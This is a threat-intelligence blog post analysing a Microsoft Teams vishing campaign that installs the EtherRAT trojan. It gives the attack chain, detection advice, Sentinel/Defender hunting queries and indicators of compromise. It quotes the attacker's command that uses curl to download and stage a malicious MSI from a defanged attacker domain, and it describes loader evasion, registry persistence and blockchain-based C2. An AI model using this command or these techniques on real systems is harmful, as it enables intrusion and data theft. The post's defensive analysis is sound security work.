Secutiry News

Anatomy of a Teams Vishing Attack

How Fake IT Support Calls Deliver EtherRAT | Modern Workplace Security
Threat Intelligence Microsoft Teams Identity Security

How Fake IT Support Calls Are Delivering EtherRAT

A phishing PDF, a spoofed “System Administrator,” a Teams screen-share, and a blockchain-anchored RAT — this campaign is a masterclass in why identity and endpoint controls have to work together. Here’s the full attack chain, the technical internals, and what your Intune/Entra/Defender stack should be doing about it.

Modern Workplace Security · Deep Dive · Based on Unit 42 research, June–July 2026

TL;DR

A threat actor tracked by Palo Alto Networks’ Unit 42 is running a multi-stage social engineering campaign that starts with a phishing email (“Employee Survey”), pivots to a live Microsoft Teams voice call from a spoofed external “System Administrator,” and ends with a Node.js-based RAT called EtherRAT that resolves its command-and-control address from an Ethereum smart contract. The attacker abuses Teams’ built-in remote-control feature to drive the victim’s mouse and keyboard directly, walks them through installing legitimate RMM tools (HopToDesk, AnyDesk), then delivers a malicious MSI that stages a real Node.js runtime to run the final payload. Unit 42 found an open directory hosting nine iterations of the installer, meaning this is an actively maintained toolkit, not a one-off.

Why This Matters to EUC and Security Teams

This isn’t a novel exploit. There’s no zero-day here, no privilege escalation bug, no clever bypass of a security boundary. Every single technique in this chain — the phishing email, the Teams call, the screen-share, the RMM install, the MSI execution — works because a human being clicked “Accept” and then “Yes, I trust this.” That makes it squarely an identity and endpoint-management problem, which is exactly the seam between EUC and SecOps that most orgs still haven’t closed.

If you administer Intune, Entra ID, and Conditional Access for a living, this campaign is worth studying closely because the controls that stop it aren’t exotic. They’re the same enrollment restrictions, external-access policies, and endpoint detection rules you already manage — they’re just not always turned on, tuned, or monitored.

The Full Attack Chain

  • Phishing email — “Employee Survey results” HTML email lands in the inbox with a PDF attachment: “EE Survey – How to log on.pdf.”
  • Teams vishing call — Shortly after the PDF is opened, the victim receives an inbound Teams call from an external account impersonating a “System Administrator,” flagged by Teams as External (unfamiliar).
  • Remote control granted — The victim is talked into giving the caller control of their screen via Teams’ native give/request-control feature.
  • RMM tools installed — Under remote control, the attacker has the victim download and install HopToDesk and AnyDesk, giving persistent remote access independent of the Teams session.
  • Malicious MSI staged — Using a command shell, the attacker pulls v7.msi from an attacker-controlled domain and executes it.
  • Loader unpacks Node.js — The MSI drops a batch script, an obfuscated JS loader, and an encrypted blob, then downloads a legitimate Node.js runtime to execute the payload under a trusted-looking process.
  • Multi-stage decryption — A chain of custom ciphers progressively decrypts the loader down to the final payload.
  • EtherRAT executes — The final Node.js-based RAT installs registry persistence and resolves its live C2 address from an Ethereum smart contract.

Stage 1 — The Phishing Lure

The campaign starts conventionally: an “Employee Survey results” email carrying a PDF named to look like onboarding instructions. Opening the PDF doesn’t itself trigger a payload — its job is to prime the target for the phone call that follows. This is a pattern worth flagging to your users: a document that references “logging on” or “IT instructions” followed shortly by an unexpected call is the tell, not the document’s content.

Stage 2 — The Teams Vishing Call

The core social engineering move is the voice call itself. The attacker used the account helpdesk@Progressive936.onmicrosoft.com, display name “System Administrator,” calling from a completely separate Microsoft 365 tenant (tenant ID 310e9ead-4f6f-491e-aafe-feb08c8d17a4).

Because the call originates from an external tenant with no established trust relationship, Teams surfaces the session title as “System Administrator (External unfamiliar) | Microsoft Teams” and the participant metadata includes HasForeignTenantUsers: true. This is precisely the signal Microsoft’s newer brand-impersonation warnings are designed to surface more prominently — but a warning only works if the user notices it and knows what it means.

The uncomfortable truth: most end users have never been told that “System Administrator” popping up on a Teams call, from a tenant that isn’t theirs, is a red flag. Awareness training that focuses only on email phishing misses this entirely.

Stage 3 — Remote Control Abuse

Once trust is established, the attacker requests control of the victim’s screen through Teams’ built-in remote-control capability — the same feature used legitimately for troubleshooting and pair-working. Forensically, this leaves behind an artifact named CtrlVirtualCursorWin_..., generated when Teams injects the controller’s mouse movements into the controlled machine via a virtual cursor. Its presence is strong evidence the attacker was actively driving the session rather than merely talking the victim through steps.

While in control, the attacker also pivoted into the organization’s ServiceNow portal and opened a legitimate support ticket requesting application access — a small but telling detail. The actor isn’t just deploying malware; they’re laying groundwork for follow-on social engineering against the real IT team, using a ticket that looks completely normal in the queue.

Stage 4 — Legitimate RMM Tools as Persistence

Rather than relying solely on the Teams session (which the victim could end at any time), the attacker has the victim browse to and install two legitimate remote-access tools — HopToDesk and AnyDesk — while still in control via Teams. This gives the attacker a durable remote-access channel that doesn’t depend on Teams staying connected and that most EDR products won’t flag by default, since both tools are legitimate commercial software with valid signatures.

This “living-off-legitimate-tools” pattern mirrors what Unit 42 and Microsoft have both flagged in related Teams-vishing campaigns this year, including the A0Backdoor and Quick Assist-based intrusions from earlier in 2026.

Stage 5 — The MSI Loader

With RMM access established, the attacker fetches the actual payload:

cmd /c curl -Lo C:\Users\{user}\AppData\Local\Temp\v7.msi hxxps://camorreado[.]click/v7.msi

v7.msi is a Windows Installer package whose custom action is itself JavaScript-driven. On execution it drops three files into the local AppData directory:

FileRole
R2YxSP2m.cmdBatch script — stages the Node.js runtime and kicks off execution
z0SYYdWk9g.datObfuscated JavaScript loader — first decryption stage
eXYlcnebRLrWyBc.iniEncrypted binary blob — contains the final payload

The install’s CustomAction runs conhost --headless cmd /c "R2YxSP2m.cmd". That batch script downloads a genuine copy of Node.js v18.20.5 directly from nodejs.org, extracts it into a folder renamed 1DIZ0D, and launches node.exe against the JS loader — all under conhost --headless, so nothing visible pops up on screen.

The JavaScript loader decrypts its embedded hex-encoded data using a subtraction cipher keyed with a hardcoded 24-byte value, producing a second-stage loader. That second stage then runs a multi-step cipher chain to decrypt the .ini blob, which unpacks into the final EtherRAT payload.

Why route through a legitimate Node.js download instead of shipping node.exe directly? It sidesteps signature-based detection on a bundled interpreter, blends outbound traffic with a request to nodejs.org that looks completely benign, and gives the attacker a genuine, unmodified runtime to execute in — reducing the malware’s own footprint to a handful of small script and data files.

Stage 6 — EtherRAT and Blockchain-Anchored C2

EtherRAT is a cross-platform, Node.js-based remote access trojan. Once running, it can execute arbitrary commands, manipulate the file system, exfiltrate data, and establishes persistence via the registry Run key, disguised under an entry named OneDriveSetup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveSetup

Its most distinctive feature is how it finds its command-and-control server. Instead of a single hardcoded domain that defenders can sinkhole or a DGA that can be reverse-engineered, EtherRAT queries an Ethereum smart contract to resolve the current, live C2 address:

Smart contract:  0x6e044e19000487c4a6e6af15b4132a5561b5ee1f
Hosting contract: 0x788a5336c0ef70be87619a3c13a43050c426f7ec
Fallback C2:      hxxps://necropatia[.]com

Because the contract lives on a public, decentralized, censorship-resistant blockchain, the attacker can update the C2 address at will simply by pushing a new transaction — no registrar to serve a takedown notice to, no DNS provider to lean on. Unit 42’s investigation surfaced several C2 endpoints resolved this way, all hosted on Azure Cloud App domains (*.cloudapp.azure.com), which further blends the traffic in with legitimate cloud service usage.

EtherRAT isn’t new to Unit 42’s radar — it was previously linked to state-sponsored activity exploiting the React2Shell vulnerability, and has since been picked up by a widening pool of financially motivated actors. This campaign is evidence of that adoption curve continuing.

Actor Infrastructure — Still in Active Development

Unit 42 discovered an open directory on camorreado[.]click hosting installer versions v1 through v9, last updated June 26, 2026 — just two days before the report published. That cadence signals a toolkit under active iteration rather than a single burst campaign, and it’s a strong hint that variant hashes and even distribution domains will keep shifting.

Detection and Defense — What Your Stack Should Actually Be Doing

Entra ID / Teams external access

  • Review and tighten External Access and Guest/B2B settings in the Teams admin center — restrict which external domains can initiate chats and calls rather than leaving it open to “everyone.”
  • Ensure the brand impersonation / external caller warnings Microsoft rolled out this year are enabled and that end users have actually been shown what they look like.
  • Enable the new policy that routes suspected third-party bots and unrecognized external participants into a lobby requiring organizer approval.

Conditional Access

  • Use Conditional Access to gate sensitive apps (ServiceNow, HR portals, admin consoles) behind device compliance and MFA, so a compromised endpoint doesn’t automatically mean compromised SaaS access.
  • Consider Conditional Access Authentication Context around high-value internal portals to add step-up verification when accessed from a session that just had a remote-control event.

Intune / endpoint controls

  • Application control (WDAC/AppLocker via Intune) to restrict execution of unauthorized MSI installers and unsigned/unexpected RMM binaries.
  • Attack surface reduction rules in Defender for Endpoint to block Office/PDF-reader child processes from spawning cmd.exe/powershell.exe, and to flag curl.exe/conhost --headless chains launching from user Temp directories.
  • Maintain an allow-list posture for RMM tools; alert on installation of RMM software that isn’t on your organization’s approved list (HopToDesk in particular is rarely legitimate in most enterprise environments).

User awareness

  • Extend phishing training beyond email to explicitly cover Teams vishing: real IT support does not cold-call over Teams from an unfamiliar external tenant and ask to take control of your screen.
  • Establish and publicize a real verification channel (a callback number, an internal ticketing flow) so employees have a fast, obvious alternative to just trusting the caller.

Hunting Queries for Microsoft Sentinel / Defender

These are starting points to adapt to your own environment and table schemas — validate field names against your workspace before deploying.

Teams calls from external “unfamiliar” tenants followed by remote control

// Requires Teams/Office 365 audit ingestion into Sentinel
OfficeActivity
| where OfficeWorkload == "MicrosoftTeams"
| where Operation in ("ChatCreated", "MeetingParticipantDetail")
| where ClientIP != "" 
| extend ExternalTenant = tostring(parse_json(Parameters)["ForeignTenantId"])
| where isnotempty(ExternalTenant)
| project TimeGenerated, UserId, Operation, ExternalTenant, Parameters
| order by TimeGenerated desc

Suspicious MSI execution followed by Node.js download

DeviceProcessEvents
| where FileName in~ ("msiexec.exe", "conhost.exe")
| where ProcessCommandLine has_any ("--headless", ".msi")
| join kind=inner (
    DeviceNetworkEvents
    | where RemoteUrl has "nodejs.org"
       or RemoteUrl has_any (".click", ".xyz")
) on DeviceId
| project TimeGenerated, DeviceName, ProcessCommandLine, RemoteUrl, InitiatingProcessFileName

curl.exe fetching an MSI from a non-standard domain

DeviceProcessEvents
| where FileName =~ "curl.exe"
| where ProcessCommandLine has ".msi"
| where ProcessCommandLine !has_any ("microsoft.com", "windowsupdate.com")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine

Registry persistence masquerading as OneDrive

DeviceRegistryEvents
| where RegistryKey has @"CurrentVersion\Run"
| where RegistryValueName =~ "OneDriveSetup"
| where RegistryValueData !has "Microsoft OneDrive"
| project TimeGenerated, DeviceName, RegistryValueData

Indicators of Compromise

Attacker infrastructure

TypeValue
Attacker Teams accounthelpdesk@Progressive936.onmicrosoft[.]com
Attacker tenant ID310e9ead-4f6f-491e-aafe-feb08c8d17a4
Distribution domaincamorreado[.]click
Fallback C2 domainnecropatia[.]com
C2 resolution contract0x6e044e19000487c4a6e6af15b4132a5561b5ee1f
Hosting contract0x788a5336c0ef70be87619a3c13a43050c426f7ec

Resolved C2 endpoints (Azure-hosted)

seconds.australiaeast.cloudapp.azure[.]com
resurce.swedencentral.cloudapp.azure[.]com
cover.wedencentral.cloudapp.azure[.]com
dns1.southafricanorth.cloudapp.azure[.]com

File hashes (SHA-256)

FileHash
v7.msifc2907fa866f86e0821f75060a331ce69ee10ff3aa374587993b17ba5406fa33
stage2_payload1.cmdc2eeb74892408496f5a307a5b1fdc92d94fd014ab4252868f04046bf84718ab6
stage2_payload2.js94cb54d53927e4ba469099760db531be563a84d716df69e864062d90f0f2448d
stage2_payload3.dat0cb2f7651d50e1ed1a691e82f0297d49444bdded2461e136cffb156d4f234e52
stage3_payload1.jsd46b4e8d188fe1773c44d38d730dcb6287639568240c765d9ad4ad79cd239e82
stage4_payload1.jsc16784e2c7b3e3b798addd718850da18f8eb532ab8f352c769a4470d7124805d

Key Takeaways

1. This is an identity/EUC problem wearing a malware costume. Every stage before EtherRAT even runs relies on trust decisions a real IT admin controls: who can call your users on Teams, what happens when they ask for screen control, and what’s allowed to install.

2. Blockchain C2 raises the disruption bar. Sinkholing a domain doesn’t kill this malware family — the smart contract can just be updated with a new address. Detection needs to shift toward behavior (process chains, persistence patterns) rather than relying solely on domain reputation.

3. “Living off legitimate software” is the throughline of 2026’s Teams-abuse campaigns. Quick Assist, HopToDesk, AnyDesk, a genuine Node.js runtime — none of this trips traditional malware signatures, because none of it is malware. Your detection strategy has to account for legitimate tools used illegitimately.

Sources: Unit 42 (Palo Alto Networks) threat intelligence report, June 28, 2026; BleepingComputer reporting by Lawrence Abrams, July 6, 2026. Indicators current as of publication — verify against live threat intel feeds before blocking.
A
Written by
Anand Kumar
Microsoft Security Consultant and IT EUC Engineer with 15+ years helping organisations modernise endpoint management and lock down Microsoft 365 using Zero Trust principles.

Leave a Comment

Your email address will not be published. Required fields are marked *